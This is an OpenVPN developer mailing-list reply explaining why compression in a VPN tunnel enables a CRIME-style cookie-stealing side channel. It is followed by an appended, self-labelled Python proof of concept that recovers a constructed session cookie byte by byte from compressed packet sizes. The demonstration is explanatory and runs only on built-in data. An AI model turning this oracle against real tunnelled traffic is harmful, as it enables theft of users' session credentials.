Hi,

On Fri, Apr 02, 2021 at 08:35:36PM +0200, Simon Matter wrote:
> What I'm still wondering is why is compression so dangerous with OpenVPN
> but not so with things like SSH or SCP?
The problem is adversary-controlled traffic in a VPN tunnel, like "you surf on a web site, and there is JavaScript that makes your browser send carefully crafted requests while someone looks at your VPN tunnel from the outside".

If compression is active, an attacker can see if "the parts of the header that he cannot see" are similar to "the parts that the JavaScript creates", due to compression making the resulting packets smaller if sequences are identical. Supposedly you can use this to steal stuff like session cookies, which JavaScript would normally not be able to see.

Now, I personally find this all a bit unrealistic in practice - it's quite a number of "ifs", and even then, it's unclear if possible in practice, or even interesting enough, given the myriad of easier-to-exploit attack vectors. But it *is* a possible attack, and if weighing "is this a good feature?" against maintenance effort and possible security effects, compression starts drifting towards the negative side (because most traffic inside VPNs is already compressed or encrypted anyway today, so compression won't have a big effect).

Now, in ssh, you copy files of your own choice. Compression is useful there, if the files are not already compressed. An attacker won't be able to manipulate just *part* of one file, to see if the neighbouring 100 bytes are "similar"... so this class of attacks does not exist.

(Crypto people, correct me if I misstated something...)

gert
-- 
"If was one thing all people took for granted, was conviction that if you
 feed honest figures into a computer, honest figures come out. Never doubted
 it myself till I met a computer with a sense of humor."
                             Robert A. Heinlein, The Moon is a Harsh Mistress

Gert Doering - Munich, Germany                             g...@greenie.muc.de
_______________________________________________
Openvpn-devel mailing list
Openvpn-devel@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/openvpn-devel
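The scenario Gert describes, as an added worked example (not code from this thread or from OpenVPN): a request whose query string the attacker controls, a session cookie the attacker cannot read, and an observer who sees only the size of each compressed request leaving the tunnel. Everything here is constructed for the demo: the request template, the host name, the secret value and the hex alphabet. The compressor is zlib's DEFLATE pinned to fixed Huffman codes (OpenVPN's compression is LZO/LZ4, not zlib, but the leak comes from LZ77 back-references, which behave the same way in all of them). Pinning the Huffman tables is what makes the measurement bit-exact via the eight-padding trick in `score`; with dynamic tables the same byte-by-byte recovery works but is noisier and needs more samples per guess.

```python
"""Compression side channel (CRIME/BREACH style) against a tunnelled request.

Added example: models an attacker who controls part of a request (the query
string), cannot read the Cookie header, and sees only the size of each
compressed request leaving the tunnel.  All data below is constructed.
"""
import zlib

SECRET = b"c0ffee42"             # the session cookie value to be recovered
ALPHABET = b"0123456789abcdef"   # attacker assumes a hex-encoded cookie

# Pin DEFLATE to fixed Huffman codes so every literal < 144 costs 8 bits and
# every literal >= 144 costs 9 bits; zlib.h defines Z_FIXED as 4.
Z_FIXED = getattr(zlib, "Z_FIXED", 4)


def build_request(injected: bytes, pad: int) -> bytes:
    """The victim's request as it enters the tunnel (constructed template).

    `injected` and `pad` are attacker-controlled; the Cookie header is
    appended by the browser and is what the attacker is after.
    """
    padding = bytes(range(0x90, 0x90 + pad))   # distinct high bytes: never match
    return (b"GET /?q=" + padding + injected + b" HTTP/1.1\r\n"
            + b"Host: intranet.example\r\n"
            + b"Cookie: session=" + SECRET + b"\r\n\r\n")


def observed_size(plaintext: bytes, compress: bool = True) -> int:
    """What the on-path observer learns: the length of the packet payload."""
    if not compress:
        return len(plaintext)
    c = zlib.compressobj(level=9, wbits=-15, strategy=Z_FIXED)  # raw DEFLATE
    return len(c.compress(plaintext) + c.flush())


def score(injected: bytes, compress: bool = True) -> int:
    """Sum of sizes over eight paddings of 0..7 nine-bit literals.

    Byte counts alone can tie: a guess that is a few bits cheaper may still
    round up to the same byte length.  The paddings walk the stream through
    every bit alignment, and sum(ceil((T + 9k) / 8) for k in 0..7) == T + 35,
    so the sum is the exact DEFLATE bit count T plus a constant: a bit-exact
    oracle built from byte sizes.
    """
    return sum(observed_size(build_request(injected, k), compress)
               for k in range(8))


def recover_cookie(compress: bool = True, max_len: int = 32) -> bytes:
    """Recover the cookie byte by byte.

    The attacker injects "session=" + known + guess.  When the guess is
    right, the LZ77 match from the Cookie header back to the query string is
    one byte longer and the next cookie byte is no longer emitted as a
    literal, so the compressed request shrinks.  Wrong guesses all cost the
    same, so the correct byte is the unique minimum; when no guess is
    strictly cheaper the secret has been exhausted (or nothing leaks).
    """
    known = b""
    for _ in range(max_len):
        scores = {g: score(b"session=" + known + bytes([g]), compress)
                  for g in ALPHABET}
        best = min(scores.values())
        winners = [g for g, s in scores.items() if s == best]
        if len(winners) != 1:
            break
        known += bytes(winners)
    return known


if __name__ == "__main__":
    print("compressed tunnel:", recover_cookie(True))
    print("no compression:   ", recover_cookie(False))
```

With compression on, the loop walks the cookie out one hex digit per sixteen guesses; with compression off (`recover_cookie(False)`, the equivalent of OpenVPN's compression being disabled) every guess produces the same size and the first round already ends with sixteen tied candidates, so nothing is recovered. The assumptions that make the oracle clean are spelled out in the comments: the guess is placed where the browser sends it before the cookie, the guess byte itself creates no incidental match, and the injected bytes reach the tunnel unencoded.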